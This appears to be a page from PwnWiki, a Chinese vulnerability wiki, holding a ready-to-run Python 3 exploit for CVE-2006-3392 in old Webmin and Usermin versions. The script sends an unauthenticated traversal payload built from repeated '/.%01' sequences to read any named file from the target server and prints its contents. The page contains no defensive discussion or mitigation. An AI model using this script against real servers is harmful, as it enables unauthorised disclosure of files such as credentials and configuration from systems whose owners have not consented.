免费、自由、人人可编辑的漏洞库--PwnWiki.com
,
Exploit
#!/usr/bin/python3
# Exploit Title: Webmin < 1.290 / Usermin < 1.220 - Arbitrary File Disclosure (Python3)
# Exploit Author: Ziani Taha @0xtz
# Vendor Homepage: http://www.webmin.com/
# Software Link: http://www.webmin.com/download.html
# Version: Webmin < 1.290 / Usermin < 1.220
# Tested on: Linux
# CVE : CVE-2006-3392
import argparse
import requests
import os
parser = argparse.ArgumentParser()
parser.add_argument('-t', '--target', help='HTTP or HTTPS', required=True, type=str)
parser.add_argument('-u', '--url',required=True, help='Server Url or IP adresse')
parser.add_argument('-p', '--port',required=True, type=int, help='Server port ex: 8080')
parser.add_argument('-f', '--file', required=True, help='File to read frome server',type=str)
args = parser.parse_args()
def main():
payload = '/.%01' * 40
#print(f'paylood:{payload}')
url = (f'{args.target}://{args.url}:{args.port}/unauthenticated/{payload}{args.file}')
print(url)
r = requests.get(url)
print('----------------------------------------------------------------\n')
print(r.text)
print('----------------------------------------------------------------\n')
if __name__ == '__main__':
main()
pwnwiki.com
